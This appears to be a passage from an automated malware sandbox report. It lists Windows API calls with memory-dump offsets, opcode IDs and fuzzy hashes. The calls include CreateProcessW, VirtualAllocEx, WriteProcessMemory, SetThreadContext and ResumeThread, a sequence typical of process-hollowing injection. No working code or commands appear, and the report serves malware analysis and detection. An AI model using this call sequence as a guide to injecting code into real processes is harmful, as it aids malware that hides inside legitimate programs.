                                                • API String ID:
                                                • Opcode ID: de8d4bc57401c1771e69193b794d655def9da33d099a95b468d0508260110663
                                                • Instruction ID: aede20f170f7ac6786b437217dec64f63599ae07d1082f68454b529c7ce42caa
                                                • Opcode Fuzzy Hash: de8d4bc57401c1771e69193b794d655def9da33d099a95b468d0508260110663
                                                • Instruction Fuzzy Hash: C421EA71E106188BEB58CFABD84079EFBF7AFC8300F14C1BAD508A6254EB3019458F55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 010C966E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 4edf451c156a2c2e70286f24d6e3b9e0328c5dfdba3dd4dc4d98d59ca4f2faca
                                                • Instruction ID: 06ac03ab9d76ae2bfb1f1f4dd4d707e5ad447e205328b3e9f8faf760c853aad1
                                                • Opcode Fuzzy Hash: 4edf451c156a2c2e70286f24d6e3b9e0328c5dfdba3dd4dc4d98d59ca4f2faca
                                                • Instruction Fuzzy Hash: 67711570A00B058FDB64DF69D04579ABBF1BF88708F008A6ED59AD7A50DB34E905CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 012A71D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 454ba4119f91d26b082803c32e5c015cfcde44b002b53ed88c4e9e3edc8740ee
                                                • Instruction ID: 3aa596288eb06ac56599574ee606e501ea7682f3d227eb49cc86df28740890d3
                                                • Opcode Fuzzy Hash: 454ba4119f91d26b082803c32e5c015cfcde44b002b53ed88c4e9e3edc8740ee
                                                • Instruction Fuzzy Hash: 5251F871900329DFDF24CF99C840BDDBBB6BF48314F1581AAE908A7250DB755A89CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 012A71D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 4a8cd7a845c5c3102d8f742b021f0a18f27b01c05f5916f82e2b9c6526f27f3d
                                                • Instruction ID: 91baad9f6663ebba51b900864e7e0f2cae73f56287609de480743099bba60236
                                                • Opcode Fuzzy Hash: 4a8cd7a845c5c3102d8f742b021f0a18f27b01c05f5916f82e2b9c6526f27f3d
                                                • Instruction Fuzzy Hash: 9951F871900329DFDF14CF99C880BDDBBB6BF48314F1580AAE908A7250DB755A88CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 010CFECA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 79dc41b202fd3ab76f5abd1c3cbe79cbeb4da542abeb75a1545ce219ea6c7133
                                                • Instruction ID: dc21a5b9178e3d8bf2bd0bdd62ab602a8639e04e285d1af3906de980a1bd6e83
                                                • Opcode Fuzzy Hash: 79dc41b202fd3ab76f5abd1c3cbe79cbeb4da542abeb75a1545ce219ea6c7133
                                                • Instruction Fuzzy Hash: 0651B0B1D003499FDB14CFA9D884ADEBBF6FF48714F24812AE819AB210D7749845CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 010CFECA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: d3ce537a3e862906ecde7487d29057e18eaf45fc95386b39c21ce821b4763206
                                                • Instruction ID: cf987861a07d2c35e59db8dda2156ffc720ea3d49652975b9511ab8fd33abc50
                                                • Opcode Fuzzy Hash: d3ce537a3e862906ecde7487d29057e18eaf45fc95386b39c21ce821b4763206
                                                • Instruction Fuzzy Hash: B351CEB1D002499FDB14CFA9D984ADEBFF2BF48714F24822AE419AB210D7749845CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 010C5421
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ef999ad4297a313b75f9b8537d6bf7643e46e616122ea788364f341962bd8684
                                                • Instruction ID: 2a17ae2a7354813c26a502b52149ccce0b100fc924451bdb545796f77100ae4d
                                                • Opcode Fuzzy Hash: ef999ad4297a313b75f9b8537d6bf7643e46e616122ea788364f341962bd8684
                                                • Instruction Fuzzy Hash: C34114B0D00618CFEB24CFA9C8847DEFBB1BF48308F11806AD449AB250DBB56946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 010C5421
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: f0250021bcbad0a450d74c19e6d23cea05a4e2ce6f961a9842365ab5c1f5f858
                                                • Instruction ID: 1c5e55a4e824bbd0fafc11e9ec9c66866fb7548e6769bcf314b8c6d6089ceaf0
                                                • Opcode Fuzzy Hash: f0250021bcbad0a450d74c19e6d23cea05a4e2ce6f961a9842365ab5c1f5f858
                                                • Instruction Fuzzy Hash: 0641F3B5D00619CFEB24CFA9C8847CDFBB1BF48308F21806AD449AB250DBB56946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 012A8445
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: d3288552d3bcece828ccb63f91e39e2b49adf3b15ba522c0bb620a86b9e285a9
                                                • Instruction ID: e19853555b5639d8aadfd0ec16a05885befd690f53e6d1192eac6cb755951fda
                                                • Opcode Fuzzy Hash: d3288552d3bcece828ccb63f91e39e2b49adf3b15ba522c0bb620a86b9e285a9
                                                • Instruction Fuzzy Hash: 1E21BCB2D042598BEB11CBA9E4097EEBBB0EB48305F15444EC644B7241D7791A44CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 012A76B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: e86d691dba9aea08213a4d5c8891157b282274c27577d06f946fe86005bc5a17
                                                • Instruction ID: 47ce7ea36124c3e30997e90b83742d6a3792808c9b461a7885c1d79973ed5753
                                                • Opcode Fuzzy Hash: e86d691dba9aea08213a4d5c8891157b282274c27577d06f946fe86005bc5a17
                                                • Instruction Fuzzy Hash: D32125B1900259DFDB10CF9AC984BDEBBF4FF48314F40842AE918A3250D378A554CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,010CB93E,?,?,?,?,?), ref: 010CB9FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 22c8715016e943fd21c485f7c508d7495394dfd7be43dc51661bc5d2d9daa355
                                                • Instruction ID: 6798221f7751f5a0c7f79d9c3e692743a29226bbdbae0d6ae48ab98133a5f791
                                                • Opcode Fuzzy Hash: 22c8715016e943fd21c485f7c508d7495394dfd7be43dc51661bc5d2d9daa355
                                                • Instruction Fuzzy Hash: F921E5B5900249DFDB10CFA9D584ADEBBF4EB48324F14801AE955A3310D374A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 012A76B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 72423f82092c782c37f899a242279967610ad2a8296b254c4026b764c35c8d1c
                                                • Instruction ID: d2f7f4428449c7f036c36eafe6716e34604f5deacd4f5406b54c20f0a38fba26
                                                • Opcode Fuzzy Hash: 72423f82092c782c37f899a242279967610ad2a8296b254c4026b764c35c8d1c
                                                • Instruction Fuzzy Hash: 7621E4B5900259DFDB10CF9AC985BDEBBF4FB48314F50842AE918A3250D778A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 012A752F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 5ea177a210f088a63e9a7a2fc5135f56c7a90cfa926a946e5b312395997fc618
                                                • Instruction ID: 646f32a7358158f5a13388f1aa5d005387f1263750ac2bf4b7a2a8e086a93cbe
                                                • Opcode Fuzzy Hash: 5ea177a210f088a63e9a7a2fc5135f56c7a90cfa926a946e5b312395997fc618
                                                • Instruction Fuzzy Hash: D521F0B5900259DFDB10CFAAD884BDEBBF4FB48320F50842AE958A3250D379A544CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,010CB93E,?,?,?,?,?), ref: 010CB9FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: d8469d95b11afa566e0f967128ca5bbbdf3efc9730d53e6a90ab29347ff86e71
                                                • Instruction ID: 645f70092204cd257a3f16610ac0bd0492c3336822e0c5d558d7c60ed29098b5
                                                • Opcode Fuzzy Hash: d8469d95b11afa566e0f967128ca5bbbdf3efc9730d53e6a90ab29347ff86e71
                                                • Instruction Fuzzy Hash: 9D21E0B5900248EFDB10CFA9D584BEEBBF8EF48324F14841AE955A3210D378A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 012A7467
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: c0224b56d9a6e31cf3ce5b2d1e125f2b09681d39012b256ec5d7b09ac268704b
                                                • Instruction ID: f911ff65fe7d09e8376718194855aa06a496d4a15e1ad23b4ef4f2260668f64f
                                                • Opcode Fuzzy Hash: c0224b56d9a6e31cf3ce5b2d1e125f2b09681d39012b256ec5d7b09ac268704b
                                                • Instruction Fuzzy Hash: E12115B1E1065A9FDB10CF9AD8857DEFBF4FB48324F44812AE518A3640D778A9448FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 012A752F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: f622217c233f04b82e0fd58a6e70573a90214235b0dd8674551000f0b75ea35d
                                                • Instruction ID: 892b5950ceeeb971c3fc4b6b4268d2bb9d362fb0f8a8727d02f6b2e2c88729a2
                                                • Opcode Fuzzy Hash: f622217c233f04b82e0fd58a6e70573a90214235b0dd8674551000f0b75ea35d
                                                • Instruction Fuzzy Hash: 4821E2B59002599FDB10CFAAD884BDEBBF4FB48320F50842AE958A3250D379A544CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 012A7467
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: a75023f1d54221b5ef84e7946ffddf9f78e584b1e93c8b52b89c9159f04e5a97
                                                • Instruction ID: 9da4e692faf94fdf91ef214255d2653cb6b29ce0cc5e1589aa1600122e89995b
                                                • Opcode Fuzzy Hash: a75023f1d54221b5ef84e7946ffddf9f78e584b1e93c8b52b89c9159f04e5a97
                                                • Instruction Fuzzy Hash: 0321F4B1A1065A9BDB10CF9AC4857DEFBF8FB48324F54812AE518A3240D778A9448FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010C96E9,00000800,00000000,00000000), ref: 010C98FA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: cea223accb112a7cdb1aeed599cf07f64028a738302ced402070239c45e80ef0
                                                • Instruction ID: e1252a9e9e16a49897e4df48ec58bc9b5ce23783e1ccbd4a374260ed667fa7b6
                                                • Opcode Fuzzy Hash: cea223accb112a7cdb1aeed599cf07f64028a738302ced402070239c45e80ef0
                                                • Instruction Fuzzy Hash: 341133B6D00249DFDB10CF9AD484BDEBBF4EB48324F00846EE559A7200C375A544CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010C96E9,00000800,00000000,00000000), ref: 010C98FA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 309a84deba9e2fd6eac6597d0a21359e5dffcee580ca6d3632b227b4e5b43058
                                                • Instruction ID: a59c81b30f7abbf23033e2546a9f4f022f3a762d8b84a9a11e7405bd622adcad
                                                • Opcode Fuzzy Hash: 309a84deba9e2fd6eac6597d0a21359e5dffcee580ca6d3632b227b4e5b43058
                                                • Instruction Fuzzy Hash: C61112B6D00249CFDB10CFAAC584BEEBBF4AB48324F15852EE555A7200C379A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 012A75EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: f033382fc94ba042553f5c9227f0e3f97c005024de7c6e1c621ad50b7a6481d9
                                                • Instruction ID: 197b0840f3dcc0118f231fb5b823ccb84e93e307009ae950cda72e94ed08f956
                                                • Opcode Fuzzy Hash: f033382fc94ba042553f5c9227f0e3f97c005024de7c6e1c621ad50b7a6481d9
                                                • Instruction Fuzzy Hash: CA1102B59002499FDB10CF9AC884BDEBBF4FF48324F208419E968A7250D375A954CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 012A75EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 50e9fe4f05a97c641b48167fff6a83eb7981b7f226cd1792ab68f1bba209659b
                                                • Instruction ID: 4a055117a03b41acf58f76a32d44e9a24f667ab814fcad9e82bd621f3d034b95
                                                • Opcode Fuzzy Hash: 50e9fe4f05a97c641b48167fff6a83eb7981b7f226cd1792ab68f1bba209659b
                                                • Instruction Fuzzy Hash: 441122B5900289DFDB10CF9AC884BDEBFF8FB48324F10841AE528A7210C375A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 010C966E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 4b115cfb3394e71916f48d70ca254f575b82feb48fa3b72a3add09b16265643d
                                                • Instruction ID: 8ae1e0c63468a68bac9b28366fbc4ea476e77ec3a5950a74f7499a3700fc9047
                                                • Opcode Fuzzy Hash: 4b115cfb3394e71916f48d70ca254f575b82feb48fa3b72a3add09b16265643d
                                                • Instruction Fuzzy Hash: 091122B5C002498FDB10CF9AC444BDEFBF4EF88328F15852AD469A7240C378A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 30e02e371fb37b37bc0e524e1efaf6e4377c208e29a45c88d86c5d6fb6a9c53d
                                                • Instruction ID: 50b19779ad18eccd0d80809ca47ec0ab7718e30974ffabbf0cd53b3bda997b6f
                                                • Opcode Fuzzy Hash: 30e02e371fb37b37bc0e524e1efaf6e4377c208e29a45c88d86c5d6fb6a9c53d
                                                • Instruction Fuzzy Hash: 801133B18002498FDB10CF9AC484BDEFFF8EF48324F15842AE559A3240D375A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 012A8445
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 88e2761db98ac1eb2ce52c9a8e8c45531f31e0d21aafc720989ea1436cdb7a3c
                                                • Instruction ID: 255d8daef3ce9d6b4e67c53dc6834f8c33fa06735449de848764aba0754183c0
                                                • Opcode Fuzzy Hash: 88e2761db98ac1eb2ce52c9a8e8c45531f31e0d21aafc720989ea1436cdb7a3c
                                                • Instruction Fuzzy Hash: F111D3B58002899FDB10CF9AD485BDEBBF8EB48324F14881AE955A7610D378A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 012A8445
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: ee483bf1a5dc6f21c074ca9c1f39fc456a182a59e7aa15cbbb5d178c8743d906
                                                • Instruction ID: b7d66db544c8a03607e7a5adf30f786725d4632d9c0110a0fa3cb4f94320a960
                                                • Opcode Fuzzy Hash: ee483bf1a5dc6f21c074ca9c1f39fc456a182a59e7aa15cbbb5d178c8743d906
                                                • Instruction Fuzzy Hash: 3C11E2B58003499FDB10CF9AC888BDEBFF8FB48324F14841AE555A7600C378A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 7e31eaad86c9951815032735ee5984f82e8ae636481925294650350210c5258e
                                                • Instruction ID: 33e50e0c5c12c7841d795a93606401fcdab1009da2221bfa782eaabc801ee9c0
                                                • Opcode Fuzzy Hash: 7e31eaad86c9951815032735ee5984f82e8ae636481925294650350210c5258e
                                                • Instruction Fuzzy Hash: 1D1112B58002498FDB10CF9AC488BDEBBF8EB48324F10842AD519A3240C779A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: fdf5ad641b95c6d01ab7bf7e7d34298d0c7bfe10d562e3fe16038f270072a38e
                                                • Instruction ID: 92f783bf3b6ce8e3b147513aa5be388104e077258e946851a74a4bec92d74e77
                                                • Opcode Fuzzy Hash: fdf5ad641b95c6d01ab7bf7e7d34298d0c7bfe10d562e3fe16038f270072a38e
                                                • Instruction Fuzzy Hash: C9F0F0F2C083808FEB118BA9C4153D9BFF0EF55314F44818AD64597550D37A5148DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 0z\$0z\
                                                • API String ID: 0-896527886
                                                • Opcode ID: f5e7d02b6f4c11278b95ce4a5341d5ca7e554b7ce5bdbd2e54ebdd1fc42f5109
                                                • Instruction ID: fd0251ee8c184ea7af25b03fac12de8a03175fedbccc63eba8c580bd43d812c0
                                                • Opcode Fuzzy Hash: f5e7d02b6f4c11278b95ce4a5341d5ca7e554b7ce5bdbd2e54ebdd1fc42f5109
                                                • Instruction Fuzzy Hash: 7651F674E112199FDB54CFAAD881B9EFBF2BF88300F5080A9D508A7365DB709A81CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: D0l
                                                • API String ID: 0-2225038300
                                                • Opcode ID: c4c35a6e08650553614c24edd9998eeb83346755fe78af05b2820e311a2dd796
                                                • Instruction ID: 83c8dc0dc69bf44e2de3a03b1b0e2d0f7f97afa807beb4ff4d7ff2ece541b36f
                                                • Opcode Fuzzy Hash: c4c35a6e08650553614c24edd9998eeb83346755fe78af05b2820e311a2dd796
                                                • Instruction Fuzzy Hash: 9AC1ED30E1521ACFCF08CFB9C5556AEBBF2FF88314F54842AE515A7381EB7489018BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 49411695304cd59644b71428e85e76a02cb97b759f47137ec80372231606ab12
                                                • Instruction ID: a208ec1c52535b22cc233d6eff9c606e55c120fb3c97bdea8e08baea7dfef16e
                                                • Opcode Fuzzy Hash: 49411695304cd59644b71428e85e76a02cb97b759f47137ec80372231606ab12
                                                • Instruction Fuzzy Hash: D212A2F94217468BE730DF65F99C2893BE1B74532CB904208D2652FBE9D7B8118ACF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a46446a3d0485af9e822cc5382043ab2786d61c9cdcfc7f04c53bca4d60e6d37
                                                • Instruction ID: f2da4cfae7e27b4344062c82635e127192810702d0955122fdfe0cc8524b19f5
                                                • Opcode Fuzzy Hash: a46446a3d0485af9e822cc5382043ab2786d61c9cdcfc7f04c53bca4d60e6d37
                                                • Instruction Fuzzy Hash: 0FA17032E0061A8FDF15DFE5D9445DEBBF2FF84700B1581AAE509AB261DB319905CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690280569.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30df4953c57325e9661a60cf76a063580809c231877981dd9e5217d18198db3d
                                                • Instruction ID: f23c29d9869d7df57f06d76387a7be2aa7d3a58a91cc8b5f805efbba0056d2d0
                                                • Opcode Fuzzy Hash: 30df4953c57325e9661a60cf76a063580809c231877981dd9e5217d18198db3d
                                                • Instruction Fuzzy Hash: ADC107B98217468BE720DF65F99C1893BF1BB8532CF514208D2616F7D8E7B81486CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a888e4382acf3859a4044d89bf073e4f2eba6adc250ec20c517e10fa5f3eb20c
                                                • Instruction ID: be99a3d1efa7ce5266c4fcd46e6b87cdb0a3fde56d07bd492a93658f48398c32
                                                • Opcode Fuzzy Hash: a888e4382acf3859a4044d89bf073e4f2eba6adc250ec20c517e10fa5f3eb20c
                                                • Instruction Fuzzy Hash: 31911974E14219CBDB14DFA9D980A9DFBF6BF89304F24C1A9D548A7316D7309A81CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc65745744fc309a21c9fc874d4d9f9c8b6302a06128083a05326ea9aec2631d
                                                • Instruction ID: e3cbf1ae9dbc733adef2d2c01d2780ac58936b69ba8fe3c8f73872577a9f958a
                                                • Opcode Fuzzy Hash: dc65745744fc309a21c9fc874d4d9f9c8b6302a06128083a05326ea9aec2631d
                                                • Instruction Fuzzy Hash: 6D911A74D14219CBDB14DF69D980A9DFBF2BF89304F24C1A9D548A7316D7309A81CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7162f0bfbc438ab132d161521e21c29193e608eccafcc0faa619e1b807a62f85
                                                • Instruction ID: 5131a5cec1e20883bd78c3362432218cfa5b427ddead4ccf16076f551858f611
                                                • Opcode Fuzzy Hash: 7162f0bfbc438ab132d161521e21c29193e608eccafcc0faa619e1b807a62f85
                                                • Instruction Fuzzy Hash: 417137B4E2520ACFCB04CFAAD4416AFFBF2FB89311F54942AC415B7214E7349A028F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 828e5fc57ebaeb2b4fb19b517333254802401c77768dc7486ba7497f502f8010
                                                • Instruction ID: c44ae49e4422298be010284868c857bcba8f858005218f3d11c01a73cd187369
                                                • Opcode Fuzzy Hash: 828e5fc57ebaeb2b4fb19b517333254802401c77768dc7486ba7497f502f8010
                                                • Instruction Fuzzy Hash: B07125B4E2530ACFCB04CFAAD4415AEFBF2FB89311F54942AD415B7614E7349A028F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
